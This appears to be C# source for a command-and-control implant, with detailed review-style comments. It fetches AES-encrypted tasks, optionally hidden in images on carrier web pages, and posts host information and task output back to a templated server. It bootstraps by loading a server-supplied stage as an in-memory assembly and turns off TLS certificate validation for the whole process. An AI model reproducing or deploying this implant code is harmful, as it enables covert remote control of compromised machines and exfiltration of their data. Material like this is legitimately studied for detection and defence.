/// <summary>
/// Polls <paramref name="rpaddress"/> with an HTTP GET and returns the task it carries,
/// or null when the body is empty or does not deserialize as a <see cref="TaskMsg"/>.
/// </summary>
/// <param name="wc">Web client used for the request; its proxy and credential settings are overwritten here.</param>
/// <param name="aeskey">AES key used to decrypt the response body.</param>
/// <param name="aesiv">AES IV used to decrypt the response body.</param>
/// <param name="rpaddress">Full URL that is polled; must contain a '/' (the prefix up to the last one is the base URL).</param>
/// <param name="targetclass">Filter handed to <c>ImageLoader.Load</c>; only used when <paramref name="isCovered"/> is set.</param>
/// <param name="isCovered">When true the body is treated as an HTML page and the base64 text is recovered from an image it references.</param>
/// <returns>The deserialized task, or null.</returns>
/// <remarks>
/// Only the JSON deserialization step is caught (and mapped to null). Failures while downloading,
/// extracting the image payload, base64-decoding or decrypting propagate to the caller.
/// </remarks>
public static TaskMsg GetTaskHttp(CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string targetclass, bool isCovered)
{
    wc.UseDefaultCredentials = true;
    wc.Proxy = WebRequest.DefaultWebProxy;
    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

    string body = wc.DownloadString(rpaddress);
    if (string.IsNullOrEmpty(body))
    {
        return null;
    }

    if (isCovered)
    {
        // The downloaded page is only a carrier; the actual text is embedded in an image it references.
        string baseurl = rpaddress.Substring(0, rpaddress.LastIndexOf('/'));
        byte[] extracted = ImageLoader.ImageLoader.Load(baseurl, rpaddress, body, wc, targetclass);
        body = Encoding.Default.GetString(extracted);
    }

    string json = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(body), aeskey, aesiv);
    try
    {
        return new JavaScriptSerializer().Deserialize<TaskMsg>(json);
    }
    catch (Exception)
    {
        // A malformed task document is reported to the caller as "no task".
        return null;
    }
}
// AES
/// <summary>
/// Sends one task result to <paramref name="rpaddress"/> as a single, unchunked, AES-encrypted POST.
/// </summary>
/// <param name="taskinstance">Task instance id placed in the message.</param>
/// <param name="output">Result text sent as the message's <c>Data</c>.</param>
/// <param name="wc">Web client used for the request; its proxy and credential settings are overwritten here.</param>
/// <param name="aeskey">AES key for the message body.</param>
/// <param name="aesiv">AES IV for the message body.</param>
/// <param name="rpaddress">URL that receives the POST.</param>
/// <param name="param">Form field name the base64 ciphertext is posted under.</param>
/// <param name="agentid">Agent identifier placed in the message.</param>
/// <param name="agentpivot">Optional pivot identifier; copied into the message only when non-null.</param>
/// <remarks>The server reply is discarded. Any exception from serialization, encryption or upload propagates.</remarks>
public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
{
    ResponseMsg message = new ResponseMsg();
    message.TaskInstanceid = taskinstance;
    message.SystemInfo = GetSystemInfo();
    message.Chunked = false;
    message.Agentid = agentid;
    message.Number = 1;
    message.Data = output;
    if (agentpivot != null)
    {
        message.AgentPivot = agentpivot;
    }

    string json = new JavaScriptSerializer().Serialize(message);
    var cipher = Crypto.Aes.EncryptAesMessage(json, aeskey, aesiv);
    string form = param + "=" + Convert.ToBase64String(cipher);

    wc.UseDefaultCredentials = true;
    wc.Proxy = WebRequest.DefaultWebProxy;
    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
    wc.UploadString(rpaddress, form);
}
/// <summary>
/// Downloads the first image tag of <paramref name="page"/> that matches <paramref name="targetclass"/>
/// and returns the payload bytes extracted from that image.
/// </summary>
/// <param name="baseurl">Prefix prepended to the tag's <c>src</c> attribute to form the download URL.</param>
/// <param name="rpaddress">Value sent as the Referer header of the image request.</param>
/// <param name="page">HTML text scanned for image tags.</param>
/// <param name="wc">Web client used for the download; the Referer header is added to it and never removed here.</param>
/// <param name="targetclass">Filter passed through to <c>GetImagesInHTMLString</c>.</param>
/// <returns>Whatever <c>GetPayloadFromImage</c> extracts from the image stream.</returns>
/// <remarks>
/// Throws <see cref="InvalidOperationException"/> when no tag matches and <see cref="FormatException"/>
/// when the tag's <c>id</c> attribute is not an integer. The stream opened on the image is handed to
/// <c>GetPayloadFromImage</c> and is not disposed in this method.
/// </remarks>
public static byte[] Load(string baseurl, string rpaddress, string page, CookiedWebClient wc, string targetclass)
{
    string tag = GetImagesInHTMLString(page, targetclass).First();

    wc.Headers.Add(HttpRequestHeader.Referer, rpaddress);
    string imageUrl = baseurl + GetIdValue(tag, "src");
    Stream image = wc.OpenRead(imageUrl);

    int idValue = Int32.Parse(GetIdValue(tag, "id"));
    return GetPayloadFromImage(image, idValue);
}
/// <summary>
/// Bootstrap loop: asks the server for an agent id (over HTTPS, or over a named pipe when
/// <c>#PIPENAME#</c> is non-empty), then loads the returned stage as an in-memory assembly and
/// invokes it with the server reply, the session cookie value and the pipe.
/// </summary>
/// <remarks>
/// Every <c>#...#</c> token is a template placeholder filled in before compilation.
/// The <c>catch</c> belonging to the outer <c>try</c>, the end of the <c>while</c> loop and the
/// closing brace of the method are not part of this excerpt.
/// </remarks>
public static void Execute() {
    // Candidate URL paths. pageget is not referenced anywhere in this excerpt.
    string[] pageget = { #PAGEGET # };
    string[] pagepost = { #PAGEPOST # };
    string param = "#PARAM#";
    string serverkey = "#SERVERKEY#";
    string host = "#HOST#";
    string namedpipe = "#PIPENAME#";
    int port = 0;
    int targetframework = 40;
    // TryParse return values are ignored; on a non-numeric placeholder the out variable is set to 0,
    // so the 40 above does not survive a bad #FRAMEWORK# value.
    Int32.TryParse("#PORT#", out port);
    Int32.TryParse("#FRAMEWORK#", out targetframework);
    // Fixed 10 s pause before the first contact with the server.
    Thread.Sleep(10000);
    AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg();
    agentIdReqMsg.address = host;
    agentIdReqMsg.port = port;
    agentIdReqMsg.request = "agentid";
    agentIdReqMsg.framework = targetframework;
    // Serialized once; the same request text is re-encrypted and re-sent on every iteration.
    string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg);
    // agentexit is never assigned in this excerpt; the "true &&" is redundant.
    bool agentexit = false;
    while (true && !agentexit) {
        try {
            string resp = "";
            string cookievalue = "";
            NamedPipeClientStream pipe = null;
            if (string.IsNullOrEmpty(namedpipe)) {
                // --- HTTPS transport (pipe stays null on this path) ---
                CookiedWebClient wc = new CookiedWebClient();
                wc.UseDefaultCredentials = true;
                wc.Proxy = WebRequest.DefaultWebProxy;
                wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
                WebHeaderCollection webHeaderCollection = new WebHeaderCollection();
                webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");
                // Template placeholder; presumably expands to further header additions — confirm against the generator.
                #HEADERS #
                wc.Headers = webHeaderCollection;
                ServicePointManager.Expect100Continue = true;
                // 3072 is the numeric value of SecurityProtocolType.Tls12; presumably cast because the
                // targeted reference assemblies do not expose that member.
                ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
                ServicePointManager.DefaultConnectionLimit = 9999;
                // ServicePointManager is process-global: after this line every HTTPS connection made by the
                // process accepts any server certificate, so TLS no longer authenticates the peer.
                ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); });
                string post = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate));
                // A POST path is picked at random on each iteration. The trailing 'post' argument is not
                // consumed by the format string ({0}-{2} only).
                string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post);
                resp = wc.UploadString(rpaddress, post);
                // If the indexer yields null for a missing cookie (as CookieCollection does), cookie.Value
                // throws NullReferenceException, which lands in the catch outside this excerpt.
                Cookie cookie = wc.ResponseCookies["sessionid"];
                cookievalue = cookie.Value;
            } else {
                // --- named-pipe transport; the pipe is left open and passed to the stage below ---
                try {
                    pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous);
                    pipe.Connect(5000);
                    pipe.ReadMode = PipeTransmissionMode.Message;
                    // Write the AgentIdReqMsg. The count passed to Write is the character length of the
                    // encrypted text; it equals the encoded byte count only when Encoding.Default maps every
                    // character to a single byte.
                    var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate);
                    pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length);
                    var messageBytes = ReadMessage(pipe);
                    // NOTE(review): the reply is decoded as UTF-8 while the request was encoded with Encoding.Default.
                    resp = Encoding.UTF8.GetString(messageBytes);
                } catch (Exception) {
                    // Swallowed: resp stays "" and the code below runs against an empty reply.
                }
            }
            var line = DecryptMessage(serverkey, resp);
            AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line);
            // Arguments handed to the stage: decrypted reply, cookie value ("" on the pipe path), pipe (null on the HTTPS path).
            object[] agrsstage = new object[] { line, cookievalue, pipe };
            // Loads the bytes returned for 'stage' as an assembly and calls the first method of its first
            // type. The target is null, so a static method is expected; the order of GetTypes()/GetMethods()
            // is relied upon here.
            System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage));
            assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage);
        }
        // NOTE(review): the catch clause for the try above, the end of the while loop and the closing
        // brace of Execute are not part of this excerpt.
// AES
/// <summary>
/// Posts a check-in message (agent id plus host information) to <paramref name="rpaddress"/>.
/// </summary>
/// <param name="agentid">Identifier placed in the message's <c>agentid</c> field.</param>
/// <param name="aeskey">AES key used for the request body and for decoding the reply.</param>
/// <param name="aesiv">AES IV used for the request body and for decoding the reply.</param>
/// <param name="rpaddress">URL that receives the POST.</param>
/// <param name="param">Form field name the base64 ciphertext is posted under.</param>
/// <param name="wc">Web client used for the request; its proxy and credential settings are overwritten here.</param>
/// <remarks>
/// The reply is base64-decoded and decrypted but then discarded, so a malformed reply surfaces as
/// an exception while a well-formed one has no effect.
/// </remarks>
public static void SendCheckinHttp(string agentid, byte[] aeskey, byte[] aesiv, string rpaddress, string param, CookiedWebClient wc)
{
    // Host information is gathered before the message object is built.
    SystemInfo info = GetSystemInfo();
    CheckInMsg checkin = new CheckInMsg
    {
        agentid = agentid,
        systeminfo = info,
    };

    string json = new JavaScriptSerializer().Serialize(checkin);
    var cipher = Crypto.Aes.EncryptAesMessage(json, aeskey, aesiv);
    string form = param + "=" + Convert.ToBase64String(cipher);

    wc.UseDefaultCredentials = true;
    wc.Proxy = WebRequest.DefaultWebProxy;
    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
    string reply = wc.UploadString(rpaddress, form);

    // Decrypted only to validate the reply; the plaintext is not used.
    Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(reply), aeskey, aesiv);
}
// AES
/// <summary>
/// Sends a task result to <paramref name="rpaddress"/> as AES-encrypted POSTs, splitting
/// <paramref name="output"/> into pieces of at most 1,024,000 characters.
/// </summary>
/// <param name="taskinstance">Task instance id echoed in every message.</param>
/// <param name="output">Result text; an empty string still produces one POST.</param>
/// <param name="wc">Web client used for the requests; its proxy and credential settings are overwritten here.</param>
/// <param name="aeskey">AES key for the message bodies.</param>
/// <param name="aesiv">AES IV for the message bodies.</param>
/// <param name="rpaddress">URL that receives the POSTs.</param>
/// <param name="param">Form field name the base64 ciphertext is posted under.</param>
/// <param name="agentid">Agent identifier placed in every message.</param>
/// <param name="agentpivot">Accepted for signature compatibility; not used by this implementation.</param>
/// <remarks>
/// When the output exceeds one chunk, <c>Chunked</c> is set and <c>Number</c> carries the chunk count;
/// after the last chunk a trailer with empty <c>Data</c> and <c>Number = 0</c> is posted. Server replies
/// are ignored. Any exception from serialization, encryption or upload propagates.
/// </remarks>
public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
{
    const int ChunkSize = 1024000;

    wc.UseDefaultCredentials = true;
    wc.Proxy = WebRequest.DefaultWebProxy;
    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

    ResponseMsg message = new ResponseMsg
    {
        TaskInstanceid = taskinstance,
        SystemInfo = GetSystemInfo(),
        Chunked = false,
        Agentid = agentid,
        Number = 1,
    };

    if (output.Length > ChunkSize)
    {
        message.Chunked = true;
    }
    // Ceiling division; yields 0 for empty output, but the do/while below still posts once.
    int chunkCount = output.Length / ChunkSize + (output.Length % ChunkSize == 0 ? 0 : 1);
    message.Number = chunkCount;

    int sent = 0;
    do
    {
        int start = sent * ChunkSize;
        int length = Math.Min(ChunkSize, output.Length - start);
        message.Data = output.Substring(start, length);

        string json = new JavaScriptSerializer().Serialize(message);
        var cipher = Crypto.Aes.EncryptAesMessage(json, aeskey, aesiv);
        wc.UploadString(rpaddress, param + "=" + Convert.ToBase64String(cipher));
        sent++;
    }
    while (sent < chunkCount);

    if (message.Chunked)
    {
        // Trailer: same envelope with no data and Number reset to 0.
        message.Data = "";
        message.Number = 0;
        string json = new JavaScriptSerializer().Serialize(message);
        var cipher = Crypto.Aes.EncryptAesMessage(json, aeskey, aesiv);
        wc.UploadString(rpaddress, param + "=" + Convert.ToBase64String(cipher));
    }
}